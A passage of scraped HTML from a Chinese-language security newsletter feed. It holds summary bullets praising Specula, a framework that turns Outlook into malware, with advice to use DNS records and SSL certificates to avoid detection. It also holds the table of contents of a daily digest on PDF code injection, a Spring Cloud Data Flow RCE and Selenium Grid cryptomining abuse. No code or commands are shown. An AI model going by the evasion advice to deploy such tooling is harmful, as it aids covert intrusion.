	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="1.595" data-w="200" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=7c813816&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNwWMLJ36amER7BcETsbN1iaec2DsOPde2aGNtDgV88ghbZt3vM8FiaYDA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.29516806722689076" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="952" src="https://wechat2rss.xlab.app/img-proxy/?k=faca5481&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNEPLQ8V4cznO5hCukibyrQw4SXdJJoiavlcSCy8FjQDWiaRKqYXiafmicbPg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4583333333333333" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=5f3dec96&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZnmMbSSOXzLLv374fC8mUZNeMFZvOqrmYjFwpWiaIxYJhW8HTfbQaic5aM9tuXiam7tm4SKUlJowmF6A%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNe9WmgeUdsibd4P6N7liaFwD18dBGDnSUChn3vj6FXicibZ6b0EyED1pULA/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZnmMbSSOXzLLv374fC8mUZNe9WmgeUdsibd4P6N7liaFwD18dBGDnSUChn3vj6FXicibZ6b0EyED1pULA/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=2855155155215121"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Specula 框架的创新之处在于它提供了一种自然且易于扩展的方式来利用 Outlook 作为一个功能完整的恶意软件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">安全性和隐蔽性：推荐使用 DNS 记录和 SSL 证书来增强安全性和隐蔽性，减少被检测到的风险。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">易用性：Specula 提供了详细的安装和配置指南，包括视频教程和注册表项的自动生成工具，以简化用户的操作。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">配置灵活性：Specula 提供了多种配置选项，允许用户根据自己的需求定制服务器的行为和通信方式。</section></li></ul>
	<br/>
	<p>🏷️: 恶意软件, Outlook, VBScript, Python, Web服务器</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=5afdb0e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46vfEibIH57REKzBPUKgDubRickg6g44OtmibSJ6Gaibr8icCItHpX9WyoJJw%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487691">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3c6ed506&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487691%26idx%3D1%26sn%3D383f62eea8e5e77b27c6b320d9af61c1%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 30 Jul 2024 08:41:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0726 |  Selenium Grid Rce、红队新技术、spring Skipper组件rce</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487685&amp;idx=1&amp;sn=7eb34d26696d991deb33192ae556c622</link>
      <description>PDF恶意代码注入、线程名称攻击、Spring Cloud漏洞、人脸识别安全、AWS令牌结构及Selenium Grid服务滥用等关键技术分析</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-26 16:39</span> <span style="display: inline-block;">北京</span>
</p>

<p>PDF恶意代码注入、线程名称攻击、Spring Cloud漏洞、人脸识别安全、AWS令牌结构及Selenium Grid服务滥用等关键技术分析</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=83be684a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFYK1WPOgQqxP9bfoq8LmEolOxRlXQdlbVB7tZCzibia8q3IT6295vKNmA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-26 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240726</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code></p></blockquote><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0726】利用PDF文件注入恶意代码攻击技术<br/>0x02 【2024-0726】利用线程名称进行攻击的新技术<br/>0x03 【2024-0726】Spring Cloud Data Flow 远程代码执行漏洞（CVE-2024-37084）<br/>0x04 【2024-0726】人脸识别的不同面貌：操作与攻击<br/>0x05 【2024-0726】揭秘AWS会话令牌的内部结构<br/>0x06 【2024-0726】SeleniumGreed：利用暴露的Selenium Grid服务进行加密货币挖矿<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 利用PDF文件注入恶意代码攻击技术</span></h3>
